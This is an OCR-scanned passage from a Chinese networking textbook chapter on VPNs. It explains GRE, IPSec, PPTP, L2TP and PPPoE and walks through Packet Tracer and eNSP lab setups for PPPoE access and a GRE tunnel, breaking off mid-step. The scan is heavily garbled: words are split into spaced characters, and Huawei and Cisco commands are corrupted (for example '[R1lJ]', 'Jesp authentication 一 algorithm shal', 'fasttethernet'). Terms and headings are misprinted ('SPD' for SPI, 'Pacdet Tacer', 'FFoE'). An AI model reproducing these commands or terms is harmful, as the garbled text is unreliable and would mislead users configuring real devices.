[R1 - Tunnel0/0/1]tunnel - protocol gre 

[R1 - Tunnel0/0/1]source 20.1.1.1 // 配 置 隧道 的 源 IP 地 址 

[R1 - Tunnel0/0/1]destination 20.1.1.2 // 配 置 隧道 的 目的 IP 地 址 

[R1 - Tunnel0/0/1]quit 

[R1]ip route— static 10.1.2.0 24 tunnel 0/0/1 

隧道 两 端 设备 通过 关键 字 字 段 (Key) 来 验证 对 端 是 否 合法 。 关 键 字 验 证 是 指 对 隧道 
端口 进行 校 验 ,这 种 安全 机 制 可 以 防止 错误 接收 到 来 自 其 他 设备 的 报 文 。 关 键 字 字段 是 
一 个 4 字 节 长 的 数值 。 若 GRE 报 文 头 中 的 K 位 为 1, 则 在 GRE 报 文中 会 插入 关键 字 字 
段 。 只 有 隧道 两 端 设置 的 关键 字 完 全 一 致 时 才能 通过 验证 ,否则 报 文 将 被 丢弃 。 


3. IPSec VPN 


企业 对 网 络 安全 性 的 需求 日 益 提 升 .而 传统 TCP/IP 协议 缺乏 有 效 的 安全 验证 和 保 
密 机 制 。IPSec(Internet Protocol Security,IP 安全 协议 ) 是 一 种 由 IETF 指定 的 开放 标 
准 的 安全 框架 结构 ,不 是 一 个 单独 的 协议 。 在 网 络 层 可 以 用 来 保证 IP 数据 报 文 在 网 络 上 
传输 的 机 密 性 完整 性 、 真 实 性 和 防 重 放 。 企 业 分 支 可 以 通过 IPSec VPN 接 人 企业 总 部 
网 络 。 相 比 而 言 ,GRE VPN 并 没有 在 隧道 传输 中 对 数据 进行 加 密 保 护 , 因 此 存在 安全 问 
题 。 而 IPSec VPN 则 构建 了 一 个 安全 的 隧道 。 

(1) 机 密 性 (Confidentiality) : 在 传输 数据 包 之 前 将 其 加 密 , 以 保证 数据 的 机 密 性 。 

(2) 完整 性 (Integrity): 在 目的 地 验证 数据 包 , 以 保证 数据 包 在 传输 过 程 中 没有 被 修 
改 ( 防 算 改 ) 。 

(3) 真实 性 (Authentication) : 验证 数据 源 ,以 保证 数据 来 自 真实 的 发 送 者 ( 防 冒充 )。 

(4) 防 重 放 (Anti-replay) : 防止 恶意 用 户 通 过 重复 发 送 捕 获 到 的 数据 包 进 行 攻击 , 即 
接收 方 会 拒绝 旧 的 或 重复 的 数据 包 。 

IPSec 安全 体系 结构 主要 由 AH(Authentication Header, 身份 验证 头 ) 协 议 `ESP 
(Encapsulating Security Payload ,封装 安全 负载 ) 协 议和 IKE(Internet Key Exchange, 密 
钥 管理 ) 协 议 套 件 组 成 。 其 中 ,AH 协议 提供 了 源 身份 验证 、 数 据 完整 性 校 验 和 防 报 文 重 
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放 功 能 ,但 并 不 加 密 所 保护 的 数据 报 ; ESP 协议 除 提供 了 AH 协议 的 所 有 功能 外 (但 其 数 
据 完整 性 校 验 不 包括 IP 头 ) ,还 提供 对 IP 报 文 的 加 密 功 能 ; IKE 协议 用 于 自动 协商 AH 
和 ESP 所 使 用 的 密码 算法 ,提供 密 钥 协商 建立 和 维护 安全 联盟 SA 等 服务 。IPSec 的 密 
钥 管 理 包括 密 钥 的 确定 和 分 发 。 

IPSec 支持 手动 密 钥 分 配 和 自动 密 钥 分 配 两 种 管理 方式 。 手 动 密码 分 配方 式 的 优点 
是 简单 ,缺点 是 安全 性 较 低 ; 自动 密 钥 分 配 的 优点 是 安全 性 较 高 ,缺点 是 算法 实现 、 密 钥 
管理 等 较 复杂 。 

安全 联盟 SA 定义 了 IPSec 对 等 体 间 将 使 用 的 数据 封装 模式 、 验 证 和 加 密 算法 、 密 钥 
等 参数 。 安 全 联盟 是 单 向 的 ,两 个 对 等 体 之 间 的 双向 通信 ,至 少 需要 两 个 SA。 建立 安全 
联盟 SA 的 方式 有 以 下 两 种 。 

(1) 手动 方式 。 安 全 联盟 所 需 的 全 部 信息 必须 手动 配置 。 手 工 建立 安全 联盟 比较 复 
杂 , 但 优点 是 可 以 不 依赖 IKE 而 单独 实现 IPSec 功能 。 当 对 等 体 设备 数量 较 少 时 ,或 是 
在 小 型 静态 环境 中 ,手动 配置 SA 是 可 行 的 。 

(2) IKE 动态 协商 方式 。 只 需要 通信 对 等 体 间 配置 好 IKE 协商 参数 ,由 IKE 自动 协 
商 来 创建 和 维护 SA。 动 态 协 商 方式 建立 安全 联盟 相对 简单 些 ,对 于 中 、 大 型 的 动态 网 络 
环境 ,推荐 使 用 IKE 建立 SA。 

总 而 言 之 ,SA 是 IPSec 的 基础 ,也 是 IPSec 的 本 质 。SA 是 通信 对 等 体 间 的 约定 , 例 
如 使 用 哪 种 协议 (AH、ESP、 两 者 结合 ) ,协议 的 操作 模式 (传输 模式 还 是 隧道 模式 ) 、 加 密 
算法 (DES 等 ) ,特定 流 中 保护 数据 的 共享 密 钥 及 密 钥 的 生存 周期 。SA 定义 的 逻辑 连接 
是 一 个 单 工 连接 , 即 连接 是 单 向 的 。SA 唯一 定义 为 一 个 三 元 组 ,包括 安全 协议 (AH 或 
ESP) 标 识 符 , 单 工 连接 的 源 IP 地 址 合 称 为 安全 参数 索引 (SPD 的 32 位 连接 标识 符 。AH 
头 在 原 有 IP 数据 包 数 据 (TCP 或 UDP 段 ) 和 原 IP 头 之 间 。 对 于 IP 数据 报头 的 协议 字 
段 , 值 50 用 来 表明 数据 报 包含 ESP 头 和 ESP 尾 , 值 51 用 来 表明 数据 报 包 含 AH 头 。 

IPSec 主要 有 传输 模式 和 隧道 模式 两 种 工作 模式 。 其 中 ,传输 模式 是 系统 默认 的 
IPSec 工作 模式 ,主要 应 用 于 两 台 主机 之 间 ( 即 端 对 端 之 间 ) 数 据 安 全 通信 的 场合 。 此 时 
AH 头 或 ESP 头 被 插入 在 原始 IP 头 和 传输 层 报头 (TCP 头 或 UDP 头 ) 之 间 。 隧 道 模式 
主要 应 用 于 两 个 网 络 之 间 进 行 数据 安全 通信 的 场合 。 例 如 将 两 台 路 由 器 (或 网 关 、 防 火 墙 
等 ) 分 别 指派 为 隧道 终结 点 ,此 时 整个 原始 IP 包 被 封装 在 一 个 新 的 IP 包 中 ,并 在 新 IP 头 
和 原始 IP 头 之 间 插 入 AH 头 或 ESP 头 。IPSec 隧道 模式 分 为 三 种 封装 方式 : AH( 只 做 
认证 ,能 保证 数据 不 会 被 自 改 ,不 能 保证 数据 的 机 密 性 ) .ESP( 做 加 密 和 认证 , 既 保证 机 密 
性 又 保证 完整 性 ,用 得 最 多 ) 和 AH-ESP( 做 加 密 和 认证 ,保证 数据 的 机 密 性 、 防 算 改 和 防 
冒充 )。 在 隧道 模式 下 ,IPSec 会 另外 生成 一 个 新 的 IP 报头 ,并 封装 在 AH 或 ESP 之 前 。 

IPSec VPN 的 配置 包括 5 步 。 

(1) 配置 网 络 可 达 。 首 先 需 要 检查 报 文 发 送 方 和 接收 方 之 间 的 网 络 层 可 达 性 ,确保 
双方 只 有 创建 IPSec VPN 隧道 才能 进行 IPSec 通信 。 

(2) 配置 ACL 识别 兴趣 流 。 因 为 部 分 流量 无 须 满足 完整 性 和 机 密 性 要 求 ,所 以 需要 
对 流量 进行 过 滤 , 选 择 出 需要 进行 IPSec 处 理 的 兴趣 流 。 可 以 通过 配置 ACL 来 定义 和 区 
分 不 同 的 数据 流 。 
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(3) 配置 IPSec 安全 提议 。IPSec 安全 提议 定义 了 保护 数据 流 所 用 的 安全 协议 、 认 证 
算法 、 加 密 算 法 和 封装 模式 。 

(4) 创建 安全 策略 。 

(5) 应 用 安全 策略 。 

IPSec VPN 的 配置 (手工 方式 ) 命 令 如 下 。 








[R1]ip route— static 10.1.2.0 24 20.1.1.2 

[R1lJ]acl number 3001 

[R1 ~ acl— adv— 3001]rule 5 permit ip source 10.1.1.0 0.0.0.255 destination 10.1.2.0 0.0. 
0.255 

[R1]ipsec proposal tranl 

[R1 - ipsec - proposal - tranl Jesp authentication 一 algorithm shal 

[R1 - ipsec ~ proposal ~ tranl ]quit 

[R1]display ipsec proposal // 配 置 验证 

[R1]ipsec policy P1 10 manual 

// 使 用 手工 方式 创建 IPSec 策略 ,并 进入 IPSec 策略 视图 ,多 个 具有 相同 policy-name 的 安全 策略 
// 组 成 一 个 安全 策略 组 。 在 一 个 安全 策略 组 中 最 多 可 以 设置 16 条 安全 策略 , 而 seg-number 越 小 
// 的 安全 策略 ,优先 级 越 高 。 在 一 个 端口 上 应 用 了 一 个 安全 策略 组 ,实际 上 是 同时 应 用 了 安全 
// 策 略 组 中 所 有 的 安全 策略 ,这 样 能 够 对 不 同 的 数据 流 采用 不 同 的 安全 策略 进行 保护 。IPSec 策 
// 略 除了 指定 策略 的 名 称 和 序号 外 , 还 需要 指定 SA 的 创建 方式 ,如 果 使 用 的 是 IKE 协商 ,需要 执行 
//ipsec-policy-template 命令 配置 

[R1 - ipsec- policy— manual ~ P1— 10]security acl 3001 

[R1 - ipsec- policy ~ manual ~ P1- 10]proposal tranl 

[R1 - ipsec — policy— manual ~ Pl1— 10]tunnel remote 20.1.1.2 

[R1 - ipsec- policy— manual ~- Pl — 10]tunnel local 20.1.1.1 

[R1 ~ ipsec — policy ~ manual ~ P1 — 10]sa spi outbound esp 54321 

[R1 - ipsec- policy ~ manual - Pl1 ~ 10]sa spi inbound esp 12345 

[R1 - ipsec — policy— manual — Pl1 — 10]sa string — key outbound esp simple Huawei 

[R1 - ipsec ~ policy— manual — Pl — 10]sa string-key inbound esp simple huawei 


上 述 IPSec VPN 是 通过 配置 静态 路 由 建立 的 ,下 一 跳 指 向 路 由 器 R2。 需 要 配置 两 
个 方向 的 静态 路 由 确保 双向 通信 可 达 。 建 立 一 条 高 级 ACL, 用 于 确定 哪些 感 兴趣 流 需要 
通过 IPSec VPN 隧道 。 高 级 ACL 能 够 依据 特定 参数 过 滤 流 量 ,进而 对 流量 执行 丢弃 、 通 
过 或 保护 操作 。 执 行 ipsec proposal 命令 ,可 以 创建 IPSec 提议 视图 。 配 置 IPSec 策略 
时 ,必须 引用 IPSec 提议 来 指定 IPSec 隧道 两 端 使 用 的 安全 协议 .加 密 算法 、 验 证 算法 和 
封装 模式 。 默 认 情 况 下 ,使 用 ipsec proposal 命令 创建 的 IPSec 提议 采用 ESP 协议 .DES 
加 密 算法 .MD5 验证 算法 和 隧道 封装 模式 。 


4. PPTP 和 L2TP 


点 对 点 隧道 协议 (PPTP) 是 一 种 网 络 协议 , 它 通 过 跨越 基于 TCP/IP 的 数据 网 络 创建 
VPN 实现 从 远程 客户 端 到 专用 企业 服务 器 之 间 数 据 的 安全 传输 。PPTP 支持 通过 公共 
网 络 ( 如 Internet) 建 立 按 需 的 、 多 协议 的 虚拟 专用 网 络 。PPTP 允许 加 密 IP 通信 ,然后 在 
要 跨越 公司 IP 网 络 或 公告 IP 网 络 ( 如 Internet) 发 送 的 IP 头 中 对 其 进行 封装 。 

第 二 层 隧道 协议 (L2TP) 是 一 种 基于 PPP 协议 的 二 层 隧道 协议 ,其 报 文 封装 在 UDP 
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之 上 ,使 用 UDP 1701 端口 。L2TP 没有 任何 加 密 措施 ,通常 和 IPSec 协议 结合 使 用 ,提供 
隧道 验证 。 它 是 典型 的 被 动 式 隧道 协议 ,可 从 客户 端 或 访问 服务 器 端 发 起 VPN 连接 。 
在 L2TP 构建 的 VPN 网 络 中 ,主要 有 L2TP 访问 集中 器 (LAC) 和 L2TP 网 络 服务 器 
(LNS) 两 种 关键 的 网 络 设备 。 其 中 ,LAC 支持 客户 端的 L2TP, 用 于 发 起 呼叫 ,接收 呼叫 
和 建立 隧道 ,是 一 种 附属 在 网 络 上 的 具有 PPP 端 系统 和 L2TPv2 协议 处 理 能 力 的 设备 。 
LNS 是 PPP 端 系统 上 用 于 处 理 L2TP 服务 器 端 部 分 的 软件 ,是 所 有 隧道 的 终点 ,LNS 终 
止 所 有 的 PPP 流 。 在 传统 的 PPP 连接 中 ,用 户 拨号 连接 的 终点 是 LAC,L2TP 使 得 PPP 
的 终点 延伸 到 LNS。 


5. PPPoE 


1998 年 ,Redback 网 络 公司 联合 UUNET 公司 和 RouterWare 软件 公司 开发 了 以 太 
网 上 的 点 对 点 协议 PPPoE, 于 1999 年 2 月 被 IEIF 接收 ,以 RFC 2516 发 布 。PPPoE 
(Point to Point Protocol over Ethernet, 以 太 网 上 的 点 对 点 协议 ) .协议 是 为 了 满足 越 来 越 
多 的 宽带 上 网 设备 (例如 XDSL、Cable、Wireless 等 ) 和 越 来 越 快 的 网 络 之 间 的 通信 而 制 
定 开发 的 标准 。 它 基于 以 太 网 (Ethernet) 和 点 对 点 拨号 协议 (PPP) 两 个 广泛 接受 的 标 
准 。PPPoE 是 在 标准 的 Ethernet 协议 和 PPP 协议 之 间 加 入 一 些小 的 改动 ,使 用 户 可 以 
在 Ethernet 上 面 建立 PPP 会 话 。 对 于 最 终 用 户 来 说 不 需要 了 解 比 较 深 的 局 域 网 技术 ,对 
于 服务 商 来 说 在 现 有 局 域 网 基础 上 不 需要 花费 巨 资 来 做 大 面积 改造 。 这 就 使 得 PPPoE 
在 宽带 接 入 服务 中 比 其 他 协议 更 具有 优势 。 该 方式 的 优点 为 可 有 效 控制 第 三 层 广 播 风 
暴 、 防 止 ARP 病毒 攻击 、 防 止 IP 被 盗用 支持 QoS, 方 便 管 理 有 效 阻止 病毒 在 局 域 网 内 
蔓延 有 效 阻 止 Sniffer 软件 对 网 络 敏感 信息 的 非法 监听 。 使 用 PPPoE 拨号 上 网 不 用 添 
加 任何 设备 ,只 需 网 卡 并 在 客户 端 安装 PPPoE 应 用 程序 即 可 ,其 使 用 方式 类 似 于 拨号 上 
网 。 因 为 对 用 户 端的 要 求 不 高 ,其 易于 普及 。 


20.3 方案 设计 


方案 设计 如 表 20-1 所 示 。 
表 20-1 方案 设计 


任务 名 称 VPN 服务 器 的 配置 与 管理 

1. 利用 Packet Tracer 模拟 实现 PPPoE 接 入 
(1) 网 络 搭建 

(2) 实现 电话 线 方式 接 人 

(3) 实现 同 轴 电 缆 方式 接 入 

任务 分 解 (4) 实现 以 太 网 方式 接 入 

2. 利用 eNSP 模拟 实现 GRE VPN 的 配置 
(1) 创建 隧道 端口 

(2) 配置 GRE 协议 

(3) 配置 隧道 源 端 和 目的 端的 IP 地址 
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续 表 





(4) GRE 协议 的 Keepalive 检测 

(5) GRE 协议 关键 字 验 证 

3. 利用 eNSP 模拟 实现 IPSec VPN 的 配置 

(1) 配置 网 络 可 达 

任务 分 解 (2) 配置 访问 控制 列表 识别 兴趣 流 

(3) 配置 IPSec 安全 提议 

(4) 定义 保护 数据 流 所 使 用 的 封装 模式 、 验 证 方法 和 加 密 算法 
(5) 创建 IPSec 的 安全 策略 

(6) 将 IPSec 的 安全 策略 指派 到 相应 端口 

. 能 配置 VPN 服务 器 

. 能 对 VPN 网 络 的 客户 端 进行 设置 

. 能 测试 VPN 连接 

.能 创建 IPSec 策略 

能 创建 第 选 器 列表 和 隧道 配置 规则 

能 将 新 的 IPSec 策略 指派 

.能 使 用 模拟 器 实现 PPPoE 三 种 方式 的 接 人 

. 熟悉 VPN 的 功能 

. 了 解 VPN 的 技术 优势 

. 了解 VPN 的 应 用 分 类 、 网 络 结构 分 类 和 接 入 方式 分 类 
. 了 解 VPN 的 典型 协议 SSL VPN IPSec VPN、PPTP、L2TP 和 PPPoE 
. 了 解 GRE 的 应 用 场景 

了 解 GRE 的 工作 原理 

. 掌握 网 络 安全 行业 的 基本 情况 

. 培养 良好 的 职业 道德 

. 树立 较 强 的 安全 意识 

培养 吃苦 耐劳 .实事求是 一丝不苟 的 工作 态度 
.培养 分 析 能 力 和 应 变 能 力 





能 力 目标 





知识 目标 





素质 目标 





四 


20.4 项 目 实 施 


41 任务 1 利用 Pacdet Tacer 模拟 实现 FFoE 接 入 
1. 任务 目标 


在 Packet Tracer 模拟 软件 上 实现 PPPoE 接 入 的 几 种 方式 ,具体 包括 以 下 几 种 方式 。 
(1) 网 络 搭建 。 

(2) 实现 电话 线 方式 接 人 。 

(3) 实现 同 轴 电缆 方式 接 入 。 

(4) 实现 以 太 网 方式 接 入 。 
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2. 案例 导入 


为 保护 企业 网 络 安全 ,需要 利用 PPPoE 技术 实现 电话 线 接 入 、 同 轴 电 缆 方式 接 入 和 
以 太 网 方式 接 入 。 


3. 工作 环境 


(1) Windows 7 系统 的 主机 。 
(2) 主机 中 预 装 Packet Tracer 软件 。 
4. 实施 过 程 


本 任务 的 网 络 拓扑 图 如 图 20-1 所 示 , 需 要 3 台 PC 机 ,2 个 网 云 ,2 台 2960 型 交换 机 ， 
2811 型 路 由 器 、 服 务 器 、DSL Modem、Cable Modem 和 Coaxial Splitter( 同 轴 分 离 器 ) 各 
1 台 。 各 设备 的 IP 地 址 信息 如 表 20-2 所 示 。 











eModem4, 
Ete— ~ 
FO 
PCO DSL Modem0 
200.200.200.0/24 210.210.210.0/24 
Fol 
Coax7 E6 FO0/2 FO4 oo _ 
FO FOLFO 
月 Ul Cloudl Fo0/3 Ei 
PCI Cable Modem0 Coaxial Splitter0 A Switch0 ISP Se 
’ 
F 0/2 
FO FO 
月 
PC-PT Switch1 
PC2 
图 20-1 任务 1 网 络 拓扑 图 
表 20-2 任务 1 设备 IP 地址 信息 表 
设备 名 称 Router0 端口 F 0/0 Router0 端口 F 0/1 Server0 
IP 地 址 200. 200. 200. 1 210. 210. 210. 1 210. 210. 210. 2 
子 网 掩 码 255. 255. 255.0 255. 255. 255.0 255. 255. 255. 0 














(1) 按照 网 络 拓扑 图 连接 各 个 设备 ,因为 3 台 主 机 通过 PPPoE 认证 后 自动 获取 IP 
地 址 ,因而 交换 机 不 需要 配置 ,正确 连 线 即 可 。 

(2) 模拟 电话 线 接 入 的 连接 说 明 : DSL Modem0 有 两 个 端口 Port0 和 Portl, 将 
Port0 端口 与 网 云 Cloud0 的 Modem4 端口 相连 ,Portl 端口 与 PC0 相连 。 而 网 云 Cloud0 
的 6 端口 与 交换 机 Switch0 的 F 0/1 端口 相连 。 

(3) 网 云 Cloud0 的 配置 说 明 : 单 击 网 云 Cloud0 进入 Config( 配 置 ) 页 面 , 在 左 侧 栏 中 
单 击 DSL ,选择 Modem4 和 Ethernet6 相连 , 单 击 Add 按钮 。 若 右 侧 下 拉 列 表 框 中 没有 
Ethernet6 , 则 需要 在 左 侧 栏 中 单 击 Ethernet6 按钮 ,在 右 侧 栏 中 单 击 DSL 单 选 按钮 ,如 
图 20-2 所 示 。 

(4) 网 云 Cloud1 的 配置 说 明 : 单 击 网 云 Cloudl 进入 Config( 配 置 ) 页 面 ,在 左 侧 栏 中 
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图 20-2 网 云 Cloud0 配置 


单 击 Ethernet6, 在 右 侧 对 话 框 栏 中 单 击 Cable 单 选 按钮 ,如 图 20-3(a) 所 示 。 然 后 在 左 侧 
栏 中 单 击 Cable, 选 择 Coaxial7 和 Ethernet6 相连 , 单 击 Add 按钮 ,如 图 20-3(b) 所 示 。 
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图 20-3 网 云 Cloudl 配置 


(5) 服务 器 的 配置 说 明 : 单 击 Server0, 在 打开 的 对 话 框 中 单 击 Desktop 选项 卡 ,配置 
其 的 IP 地 址 为 210. 210. 210. 2 , 子 网 掩 码 为 255. 255. 255. 0 ,网 关 为 210. 210. 210. 1。 
(6) 路 由 器 的 配置 : 单 击 路 由 器 ISP, 在 打开 的 对 话 框 中 单 击 CLI 选项 卡 ,在 命令 行 


中 完成 以 下 配置 。 


Router > en 
Router# configure terminal 
Router(config) # hostname ISP 


ISP(config) # username cisco password class 


ISP(config) # username sdpt password gl 
ISP(config) # username jsj password guol 


// 进 入 特权 模式 

// 进 入 全 局 配置 模式 

// 为 路 由 器 设置 主机 名 ISP 

// 设 置 PPPoE 用 户 接 入 的 用 户 名 和 密码 

// 对 不 同 用 户 设置 不 同 的 用 户 名 和 密码 ,下 同 
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ISP(config) # ip local pool mypools 200.200.200.2 200.200.200.254 
// 设 置 通过 认证 的 用 户 ,给 其 分 配 的 IP 地 址 池 范 围 ,地 址 池 名 称 可 以 随意 取 , 但 尽量 用 有 意义 的 
// 名 称 ,方便 在 配置 模拟 模板 端口 时 用 到 。 


ISP(config) # interface fastethernet 0/0 // 打 开路 由 器 F 0/0 端口 
ISP(config-if)# ip address 200.200.200.1 255.255.255.0 // 给 F 0/0 端口 配置 IP 地 址 
ISP(config-if)#no shutdown // 激 活 端 口 

ISP(config-if)#pppoe enable // 在 端口 启用 PPPoE 


ISP(config-if)# interface fasttethernet 0/1 // 打 开路 由 器 F 0/1 端口 
ISP(config-if)# ip address 210.210.210.1 255.255.255.0 // 为 F 0/1 端口 配置 IP 地 址 


ISP(config-if)#no shutdown // 激 活 端 口 

ISP(config-if)#exit // 退 出 端口 配置 模式 

ISP(config) # vpdn enable // 在 路 由 器 上 启用 虚拟 专用 拨号 网 络 vpdn 
ISP(config) # vpdn-group gl // 建 立 一 个 vpdn 组 ,进入 vpdn 配置 模式 


ISP(config-vpdn) #accept-dialin // 初 始 化 一 个 vpdn tunnel, 建立 一 个 接受 拨 入 的 vpdn 子 组 

ISP(config-vpdn-acc-in) # protocol pppoe //vpdn 子 组 使 用 PPPoE 建立 会 话 隧道 , Packet Tracer 
// 只 允许 一 个 PPPoE vpdn 组 配置 

ISP(config-vpdn-acc-in) #virtual-template 1 // 创 建 虚拟 模板 端口 1, Packet Tracer 中 可 以 建 

// 立 1~200 个 

ISP(config-vpdn-acc-in) # int virtual-template 1 // 进 入 虚拟 模板 端口 1 

ISP(config-if) # peer default ip address pool mypools // 为 ppp 链 路 的 对 端 分 配 IP 地 址 

ISP(config-i) # ppp authentication chap // 在 PPP 链 路 上 启用 Chap 验证 

ISP(config-if)# ip unnumbered f 0/0 


// 虚 拟 模板 端口 上 没有 配置 IP 地 址 ,但 是 还 想 使 用 该 端口 ,就 向 F 0/0 端口 借 一 个 IP 地 址 来 用 ， 

// 即 “借用 IP 地 址 ” 

(7) 测试 连通 性 。 单 击 图 20-1 中 的 PC0, 单 击 Desktop 选项 卡 , 单 击 PPPoE Dialer， 
在 弹出 的 对 话 框 中 的 User Name 处 输入 cisco,Password 处 输入 class, 然 后 单 击 connect 
按钮 ,弹出 *PPPoE Connected" 提 示 信 息 表示 连接 成 功 。 然 后 单 击 Command Prompt 进 
入 命令 提示 符 ,Ping 服务 器 的 IP 地 址 210. 210. 210. 2 ,能 够 成 功 Ping 通 。 使 用 同样 的 方 
法 ,在 PCl 和 了 PC2 上 分 别 使 用 sdpt/gl 和 jsj/guol Ping 服务 器 ,可 以 Ping 通 。3 台 主 机 
之 间 也 可 以 互相 Ping 通 , 实 验 成 功 。 


X42 任务 2: 利用 ehSP 模 拟 实现 GRE VN 的 配置 
1. 任务 目标 


在 eNSP 模拟 软件 上 实现 GRE VPN 的 配置 ,具体 包括 以 下 内 容 。 
(1) 创建 隧道 端口 。 

(2) 配置 GRE 协议 。 

(3) 配置 隧道 源 端 和 目的 端的 IP 地 址 。 

(4) GRE 协议 的 Keepalive 检测 。 

(5) GRE 协议 关键 字 验 证 。 


2. 案例 导入 
为 保护 企业 网 络 安全 ,需要 利用 GRE VPN 技术 实现 顺德 子 公 司 与 广州 总 公司 的 








| Co (mse8e (2) 


互联 。 
3. 工作 环境 


(1) Windows 7 系统 的 主机 。 
(2) 主机 中 预 装 eNSP 软件 。 


4. 实施 过 程 
对 于 这 一 任务 ,网 络 拓扑 图 如 图 20-4 所 示 ,需要 2 台 PC、2 台 S3700 型 交换 机 、3 台 


AR2220 型 路 由 器 。 
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图 20-4 任务 2 网 络 拓扑 图 


(1) 按照 网 络 拓扑 图 连接 各 个 设备 ,交换 机 不 需要 配置 ,正确 连 线 即 可 。 
(2) 按照 设备 IP 地 址 信息 表 ( 见 表 20-3) 配 置 顺 德 子 公 司 计算 机 Clientl 和 广州 总 公 
司 计算 机 Client2 的 IP 地 址 、 子 网 掩 码 和 网 关 。 


表 20-3 任务 2 设备 IP 地 址 信息 表 











设备 名 称 Clientl Client2 AR2 的 S1/0/0 | AR2 的 S1/0/1 
IP 地 址 10.1.1.100 10. 2. 2. 100 200. 200. 200. 2 201. 201. 201.1 
子 网 掩 码 255. 255. 255. 0 255. 255. 255. 0 255. 255.255.0 | 255. 255.. 255.0 
网 关 | | 一 一 

















(3) 路 由 器 AR1 的 基本 配置 如 下 。 


< Huawei > system-view // 进 入 系统 视图 界面 
[Huawei]sysname AR1 // 修 改 设备 名 称 为 AR1 
[AR1] interface gigabitethernet 0/0/0 // 进 入 端口 

[AR1 - GigabitEthernet0/0/0]ip address 10.1.1.1 24 // 配 置 IP 地 址 与 子 网 掩 码 
[RAR1 - GigabitEthernet0/0/0]quit // 退 出 端口 


[AR1 ] interface serial 1/0/0 

[AR1 - seriall/0/0]ip address 200.200.200.1 24 

[AR1 - serial1l/0/0]quit 

[AR1]ip route— static 0.0.0.0 0.0.0.0 200.200.200.2 


// 进 入 端口 S 1/0/0 

// 配 置 IP 地址 与 子 网 掩 码 
// 退 出 端口 

// 配 置 默 认 路 由 








I 
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(4) 路 由 器 AR3 的 基本 配置 如 下 。 


< Huawei > system — view // 进 入 系统 视图 界面 
[Huawei]sysname AR3 // 修 改 设备 名 称 为 AR3 
[AR3] interface gigabitethernet 0/0/0 // 进 入 端口 

[AR3 - GigabitEthernet0/0/0]ip address 10.2.2.1 24 // 配 置 IP 地 址 与 子 网 掩 码 
[AR3 - GigabitEthernet0/0/0]quit // 退 出 端口 
[AR3]interface serial 1/0/0 // 进 入 端口 S 1/0/0 

[AR3 - seriall/0/0]ip address 201. 201.201.2 24 // 配 置 IP 地 址 与 子 网 掩 码 
[AR3 - serial1l/0/0]quit // 退 出 端口 


[AR3]ip route- static 0.0.0.0 0.0.0.0 201.201.201.1 // 配 置 默 认 路 由 


(5) 路 由 器 AR2 的 基本 配置 如 下 。 


< Huawei > system — view // 进 入 系统 视图 界面 
[Huawei]sysname AR2 // 修 改 设备 名 称 为 AR2 
[AR2]interface serial 1/0/0 // 进 入 端口 S 1/0/0 

[AR2 - seriall/0/0]ip address 200.200.200.2 24 // 配 置 IP 地 址 与 子 网 掩 码 
[aR2 - serial1l/0/0]quit // 退 出 端口 
[AR2]interface serial 1/0/1 // 进 入 端口 S 1/0/1 

[AR2 - serial1l/0/1]ip address 201. 201.201.1 24 // 配 置 IP 地 址 与 子 网 掩 码 
[RAR2 - serial1/0/1]quit // 退 出 端口 

[AR2]rip // 开 启 rip 进程 

[AR2— rip— 1]version 2 // 运 行 v2 版 本 

[RAR2 -rip- 1]undo summary 

[aR2 - rip— 1]network 200.200.200.0 // 宣 告 直 连 网 络 
[AR2— rip— 1]network 201.201.201.0 // 宣 告 直 连 网 络 


[AR2— rip-1]quit 


(6) 测试 网 络 连 通 性 。 总 公司 和 子 公司 的 2 台 路 由 器 AR1(200. 200. 200. 1) 和 AR3 
(201. 201. 201.2) 的 外 网 端口 可 以 互相 Ping 通 。 
(7) 路 由 器 AR1 的 GRP 配置 如 下 。 


< RR1 > system— view 


[AR1 ] interface tunnel 0/0/0 // 创 建 虚拟 隧道 端口 
[AR1 - Tunnel0/0/0]tunnel - protocol gre // 配 置 GRE 协议 
[AR1 - Tunnel0/0/0]source 200.200.200.1 // 配 置 隧道 的 源 IP 地 址 , 源 IP 是 AR1 路 由 器 


// 公 网 端口 的 IP 地 址 

[AR1 - Tunne10/0/0]destination 201.201.201.2 // 配 置 隧道 的 目的 IP 地 址 , 目标 IP 是 AR3 路 
// 由 器 公 网 端口 的 IP 地 址 

[AR1 - Tunnel0/0/0]ip address 192.168.1.1 24 ”// 配 置 tunnel 的 IP 地 址 ,该 IP 地 址 应 该 使 
// 用 私有 了 地址 

[AR1 - Tunne10/0/0]quit 

[AR1]ip route— static 10.2.2.0 24 tunnel 0/0/0 


(8) 路 由 器 AR3 的 GRP 配置 如 下 。 


< AR3 > system — view 
[AR3]interface tunnel 0/0/0 // 创 建 隧道 端口 ,两 端 端口 的 编号 可 以 一 样 
// 也 可 以 不 一 样 
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[AR3 - Tunnel0/0/0]tunnel - protocol gre // 配 置 GRE 协议 

[AR3 - Tunnel0/0/0]source 201.201.201.2 // 源 IP 是 AR3 路 由 器 公 网 端口 的 IP 地 址 
[AR3 - Tunnel0/0/0]destination 200.200.200.1 // 目 标 划 是 AR1 路 由 器 公 网 端口 的 IP 地 址 
[AR3 - Tunnel0/0/0]display interface tunnel 0/0/0 // 查 看 tunnel 0/0/0 的 状态 为 up 

[AR3 - Tunnel0/0/0] ip address 192.168.1.2 24 // 配 置 tunnel 的 IP 地 址 

[AR3 - Tunnel0/0/0]quit 

[AR3]ip route- static 10.1.1.0 24 tunnel 0/0/0 


(9) 配置 完成 后 ,从 AR1 的 tunnel 0/0/0(192. 168. 1. 1) 端 口 可 以 Ping 通 AR2 的 
tunnel 0/0/0 端口 的 IP 地 址 (192. 168. 1. 2) 。 
(10) 路 由 器 AR1 的 路 由 协议 配置 如 下 。 


[AR1 - Tunnel0/0/0]quit 


[AR1]rip // 开 启 rip 进程 
[AR1 -rip- 1]version 2 // 运 行 v2 版 本 
[AR1 — rip— 1]undo summary 

[AR1 - rip— 1]network 10.0.0.0 // 宣 告 直 连 网 络 
[RAR1 ~ rip- 1]quit 

[AR1]display ip routing— table protocol rip // 查 看 路 由 表 


(11) 路 由 器 AR3 的 路 由 协议 配置 如 下 。 


[AR3 - Tunnel0/0/0]quit 





[AR3]rip // 开 启 rip 进程 
[AR3— rip— 1]version 2 // 运 行 v2 版 本 
[AR3— rip—- 1]undo summary 

[AR3— rip— 1]network 10.0.0.0 // 宣 告 直 连 网 络 
[AR3 -rip- 1]quit 

[AR3]display ip routing - table protocol rip // 查 看 路 由 表 


(12) 配置 完成 后 ,总 公司 和 子 公司 的 两 台 主 机 可 以 互相 Ping 通 。 

(13) 在 子 公司 的 路 由 器 AR1 上 抓 取 数 据 包 。 右 击 路 由 器 AR1, 选 择 “ 数 据 抓 包 ”一 
